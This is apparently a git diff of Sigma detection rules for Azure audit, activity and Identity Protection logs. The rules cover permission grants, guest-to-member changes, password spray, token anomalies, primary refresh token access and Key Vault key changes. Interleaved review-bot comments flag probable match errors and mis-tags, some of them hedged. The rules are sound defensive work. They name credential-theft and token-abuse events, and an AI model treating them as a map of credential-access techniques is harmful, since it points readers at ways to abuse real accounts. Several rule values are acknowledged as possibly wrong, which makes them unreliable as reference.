@@ -2,20 +2,21 @@ title: Granting Of Permissions To An Account id: a622fcd2-4b5a-436a-b8a2-a4171161833c status: test description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. -author: sawwinnnaung references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Granting_Permissions_To_Account_detection.yaml + - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml +author: sawwinnnaung date: 2020/05/07 -modified: 2021/11/27 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098.003 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - keywords: - - Microsoft.Authorization/roleAssignments/write - condition: keywords + keywords: + - Microsoft.Authorization/roleAssignments/write + condition: keywords falsepositives: - - Valid change + - Valid change level: medium -tags: - - attack.t1098 diff --git a/src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml b/src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml new file mode 100644 index 000000000..fcf939136 --- /dev/null +++ b/src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml 
@@ -0,0 +1,23 @@ +title: User Added To Group With CA Policy Modification Access +id: 91c95675-1f27-46d0-bead-d1ae96b97cd3 +status: test +description: Monitor and alert on group membership additions of groups that have CA policy modification access +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access +author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner' +date: 2022/08/04 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1548 + - attack.t1556 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Add member from group + condition: selection +falsepositives: + - User removed from the group is approved +level: medium diff --git a/src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml b/src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml new file mode 100644 index 000000000..434085ec9 --- /dev/null +++ b/src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml @@ -0,0 +1,23 @@ +title: User Removed From Group With CA Policy Modification Access +id: 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c +status: test +description: Monitor and alert on group membership removal of groups that have CA policy modification access +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access +author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner' +date: 2022/08/04 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1548 + - attack.t1556 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Remove member from group + condition: selection +falsepositives: + - User removed from the group is approved +level: medium 
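Review bot: The addition rule matches `properties.message: Add member from group`, which reads like a copy of the removal rule's value; the Azure AD audit activity for adding a member is, to my knowledge, `Add member to group`, so as written the rule would never fire — confirm against a sample audit event and change the line to `properties.message: Add member to group`. Its false-positive entry `- User removed from the group is approved` is likewise copied from the removal rule and should read `- User added to the group is approved`. In both rules the description restricts the alert to groups with CA policy modification access, yet neither selection filters on a target group, so every membership change in the tenant will alert; the description should state that a filter on the relevant group(s) must be added per tenant, or the rules should carry one.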
diff --git a/src/main/resources/rules/azure/azure_guest_invite_failure.yml b/src/main/resources/rules/azure/azure_guest_invite_failure.yml new file mode 100644 index 000000000..5999f29f4 --- /dev/null +++ b/src/main/resources/rules/azure/azure_guest_invite_failure.yml @@ -0,0 +1,23 @@ +title: Guest User Invited By Non Approved Inviters +id: 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9 +status: test +description: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/10 +tags: + - attack.persistence + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Invite external user + Status: failure + condition: selection +falsepositives: + - A non malicious user is unaware of the proper process +level: medium diff --git a/src/main/resources/rules/azure/azure_guest_to_member.yml b/src/main/resources/rules/azure/azure_guest_to_member.yml new file mode 100644 index 000000000..e42458ac4 --- /dev/null +++ b/src/main/resources/rules/azure/azure_guest_to_member.yml 
@@ -0,0 +1,24 @@ +title: User State Changed From Guest To Member +id: 8dee7a0d-43fd-4b3c-8cd1-605e189d195e +status: test +description: Detects the change of user type from "Guest" to "Member" for potential elevation of privilege. +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins +author: MikeDuddington, '@dudders1' +date: 2022/06/30 +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'UserManagement' + OperationName: 'Update user' + properties.message: '"displayName":"UserType","oldValue":"[\"Guest\"]","newValue":"[\"Member\"]"' + condition: selection +falsepositives: + - If this was approved by System Administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml b/src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml new file mode 100644 index 000000000..7e28e0337 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml 
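Review bot: `properties.message: '"displayName":"UserType","oldValue":"[\"Guest\"]","newValue":"[\"Member\"]"'` is an equality match, but the literal is a slice of the modified-properties JSON rather than a whole field value, so unless the backend maps `properties.message` to exactly this fragment the rule never matches. It should use a substring modifier: `properties.message|contains: '"displayName":"UserType","oldValue":"[\"Guest\"]","newValue":"[\"Member\"]"'`. Since the literal also bakes in the quoting and escaping of one log format, a sentence in the description asking deployers to verify the value against a real `Update user` event would help.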
@@ -0,0 +1,22 @@ +title: Anomalous Token +id: 6555754e-5e7f-4a67-ad1c-4041c413a007 +status: experimental +description: Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-token + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow' +date: 2023/08/07 +tags: + - attack.t1528 + - attack.credential_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'anomalousToken' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml b/src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml new file mode 100644 index 000000000..2ca44a9ef --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml 
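Review bot: `falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.` is investigation guidance, not a false-positive condition, and it is repeated verbatim in the anomalous-user, anonymous-IP-activity, anonymous-IP-address and atypical-travel rules below. Sigma consumers render this list as known benign causes, so it should name one tied to the description's own criteria, e.g. `- Token lifetime changes made by tenant policy, or a user legitimately working from a new location`, and the investigation advice can move into the description. Only the impossible-travel rule in this series gives a real benign cause (VPN connect and disconnect).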
@@ -0,0 +1,22 @@ +title: Anomalous User Activity +id: 258b6593-215d-4a26-a141-c8e31c1299a6 +status: experimental +description: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1098 + - attack.persistence +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'anomalousUserActivity' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml new file mode 100644 index 000000000..28dc45303 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml 
@@ -0,0 +1,25 @@ +title: Activity From Anonymous IP Address +id: be4d9c86-d702-4030-b52e-c7859110e5e8 +status: experimental +description: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'riskyIPAddress' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml new file mode 100644 index 000000000..cecd0cb48 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml 
@@ -0,0 +1,22 @@ +title: Anonymous IP Address +id: 53acd925-2003-440d-a1f3-71a5253fe237 +status: experimental +description: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN. +references: + - https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0 + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anonymous-ip-address +author: Gloria Lee, '@gleeiamglo' +date: 2023/08/22 +tags: + - attack.t1528 + - attack.credential_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'anonymizedIPAddress' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml b/src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml new file mode 100644 index 000000000..3c5738586 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml 
@@ -0,0 +1,25 @@
+title: Atypical Travel
+id: 1a41023f-1e70-4026-921a-4d9341a9038e
+status: experimental
+description: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1078
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.initial_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'unlikelyTravel'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml b/src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml
new file mode 100644
index 000000000..23899ccdb
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml
@@ -0,0 +1,25 @@
+title: Impossible Travel
+id: b2572bf9-e20a-4594-b528-40bde666525a
+status: experimental
+description: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#impossible-travel
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1078
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.initial_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'impossibleTravel'
+ condition: selection
+falsepositives:
+ - Connecting to a VPN, performing activity and then dropping and performing additional activity.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml b/src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml
new file mode 100644
index 000000000..565003619
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml
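Review bot: The literal in `riskEventType: 'impossibleTravel'` should be checked against the Graph riskDetection schema that the sibling anonymous-IP rule already references, because the riskEventType enum value I know for this detection is `mcasImpossibleTravel`, following the same `mcas` prefix this commit uses in `mcasSuspiciousInboxManipulationRules`. A Sigma selection that names a value the log source never emits fails silently, so replaying one known risk detection through the rule would settle it quickly. If `impossibleTravel` is confirmed correct, a one-line comment above the selection noting the source of the value would spare the next reviewer the same question.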
@@ -0,0 +1,22 @@
+title: Suspicious Inbox Forwarding Identity Protection
+id: 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d
+status: experimental
+description: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-forwarding
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1140
+ - attack.defense_evasion
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'suspiciousInboxForwarding'
+ condition: selection
+falsepositives:
+ - A legitimate forwarding rule.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml b/src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml
new file mode 100644
index 000000000..5bc55b667
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml
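Review bot: The `attack.t1140` entry under `tags:` does not describe this rule: T1140 is Deobfuscate/Decode Files or Information, whereas an inbox rule that forwards a copy of all mail to an external address is Email Collection: Email Forwarding Rule, so the tags should read `- attack.t1114.003` and `- attack.collection`. The same mis-tag is in the inbox-manipulation rule that follows (`mcasSuspiciousInboxManipulationRules`), where Hide Artifacts: Email Hiding Rules (`attack.t1564.008` with `attack.defense_evasion`) matches rules that delete or move messages. Accurate ATT&CK tags matter operationally because technique-coverage dashboards and rule-to-technique mapping in the detection pipeline key on them.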
@@ -0,0 +1,22 @@
+title: Suspicious Inbox Manipulation Rules
+id: ceb55fd0-726e-4656-bf4e-b585b7f7d572
+status: experimental
+description: Detects suspicious rules that delete or move messages or folders are set on a user's inbox.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1140
+ - attack.defense_evasion
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'mcasSuspiciousInboxManipulationRules'
+ condition: selection
+falsepositives:
+ - Actual mailbox rules that are moving items based on their workflow.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml b/src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml
new file mode 100644
index 000000000..17c116f1d
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml
@@ -0,0 +1,22 @@
+title: Azure AD Account Credential Leaked
+id: 19128e5e-4743-48dc-bd97-52e5775af817
+status: experimental
+description: Indicates that the user's valid credentials have been leaked.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#leaked-credentials
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1589
+ - attack.reconnaissance
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'leakedCredentials'
+ condition: selection
+falsepositives:
+ - A rare hash collision.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml
new file mode 100644
index 000000000..11b942592
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml
@@ -0,0 +1,22 @@
+title: Malicious IP Address Sign-In Failure Rate
+id: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd
+status: experimental
+description: Indicates sign-in from a malicious IP address based on high failure rates.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/07
+tags:
+ - attack.t1090
+ - attack.command_and_control
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'maliciousIPAddress'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml
new file mode 100644
index 000000000..961202f93
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml
@@ -0,0 +1,22 @@
+title: Malicious IP Address Sign-In Suspicious
+id: 36440e1c-5c22-467a-889b-593e66498472
+status: experimental
+description: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/07
+tags:
+ - attack.t1090
+ - attack.command_and_control
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'suspiciousIPAddress'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml b/src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml
new file mode 100644
index 000000000..7ed256421
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml
@@ -0,0 +1,22 @@
+title: Sign-In From Malware Infected IP
+id: 821b4dc3-1295-41e7-b157-39ab212dd6bd
+status: experimental
+description: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1090
+ - attack.command_and_control
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'malwareInfectedIPAddress'
+ condition: selection
+falsepositives:
+ - Using an IP address that is shared by many users
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml b/src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml
new file mode 100644
index 000000000..791d237e8
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml
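Review bot: The first reference anchor, `#malware-linked-ip-address-deprecated`, says the vendor has deprecated this detection, yet neither `description` nor `status` records that, so operators will not know the rule may simply never fire on current tenants. Suggest appending to the description a sentence such as `This risk detection is marked deprecated by Microsoft; expect little or no volume on current tenants.` and reconsidering whether `level: high` is right for a detection the vendor no longer maintains. If the deprecation is confirmed against the linked page, `status: deprecated` is the Sigma-native way to carry it rather than `experimental`.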
@@ -0,0 +1,25 @@
+title: New Country
+id: adf9f4d2-559e-4f5c-95be-c28dff0b1476
+status: experimental
+description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#new-country
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1078
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.initial_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'newCountry'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_password_spray.yml b/src/main/resources/rules/azure/azure_identity_protection_password_spray.yml
new file mode 100644
index 000000000..a477ec6c3
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_password_spray.yml
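Review bot: This rule is added as `azure_identity_protection_new_coutry_region.yml`, where `coutry` is a typo of `country`; the same kind of slip appears later in this commit with `azure_identity_protection_unfamilar_sign_in.yml` (`unfamilar`). Consumers that load rules by `id` are presumably unaffected, but file paths surface in repository search, CI output and documentation, and correcting them now avoids a rename later. Suggest `azure_identity_protection_new_country_region.yml` and `azure_identity_protection_unfamiliar_sign_in.yml`.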
@@ -0,0 +1,22 @@
+title: Password Spray Activity
+id: 28ecba0a-c743-4690-ad29-9a8f6f25a6f9
+status: experimental
+description: Indicates that a password spray attack has been successfully performed.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#password-spray
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1110
+ - attack.credential_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'passwordSpray'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_prt_access.yml b/src/main/resources/rules/azure/azure_identity_protection_prt_access.yml
new file mode 100644
index 000000000..c2c1dbdb7
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_prt_access.yml
@@ -0,0 +1,22 @@
+title: Primary Refresh Token Access Attempt
+id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1
+status: experimental
+description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/07
+tags:
+ - attack.t1528
+ - attack.credential_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'attemptedPrtAccess'
+ condition: selection
+falsepositives:
+ - This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml b/src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml
new file mode 100644
index 000000000..1d39a814a
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml
@@ -0,0 +1,25 @@
+title: Suspicious Browser Activity
+id: 944f6adb-7a99-4c69-80c1-b712579e93e6
+status: experimental
+description: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-browser
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1078
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.initial_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'suspiciousBrowser'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml b/src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml
new file mode 100644
index 000000000..c094c3138
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml
@@ -0,0 +1,26 @@
+title: Azure AD Threat Intelligence
+id: a2cb56ff-4f46-437a-a0fa-ffa4d1303cba
+status: experimental
+description: Indicates user activity that is unusual for the user or consistent with known attack patterns.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/07
+tags:
+ - attack.t1078
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.initial_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'investigationsThreatIntelligence'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml b/src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml
new file mode 100644
index 000000000..38ca23aab
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml
@@ -0,0 +1,22 @@
+title: SAML Token Issuer Anomaly
+id: e3393cba-31f0-4207-831e-aef90ab17a8c
+status: experimental
+description: Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#token-issuer-anomaly
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1606
+ - attack.credential_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'tokenIssuerAnomaly'
+ condition: selection
+falsepositives:
+ - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
+level: high
diff --git a/src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml b/src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml
new file mode 100644
index 000000000..d9dbd1c9c
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml
@@ -0,0 +1,25 @@
+title: Unfamiliar Sign-In Properties
+id: 128faeef-79dd-44ca-b43c-a9e236a60f49
+status: experimental
+description: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
+references:
+ - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties
+ - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins
+author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
+date: 2023/09/03
+tags:
+ - attack.t1078
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.initial_access
+logsource:
+ product: azure
+ service: riskdetection
+detection:
+ selection:
+ riskEventType: 'unfamiliarFeatures'
+ condition: selection
+falsepositives:
+ - User changing to a new device, location, browser, etc.
+level: high
diff --git a/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml
index ab657e79c..e23b60ee6 100644
--- a/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml
+++ b/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml
@@ -1,17 +1,23 @@
 title: Azure Keyvault Key Modified or Deleted
 id: 80eeab92-0979-4152-942d-96749e11df40
+status: test
 description: Identifies when a Keyvault Key is modified or deleted in Azure.
-author: Austin Songer @austinsonger
-status: experimental
-date: 2021/08/16
 references:
 - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+author: Austin Songer @austinsonger
+date: 2021/08/16
+modified: 2022/08/23
+tags:
+ - attack.impact
+ - attack.credential_access
+ - attack.t1552
+ - attack.t1552.001
 logsource:
- product: azure
- service: activitylogs
+ product: azure
+ service: activitylogs
 detection:
 selection:
- properties.message:
+ operationName:
 - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION
 - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE
 - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION
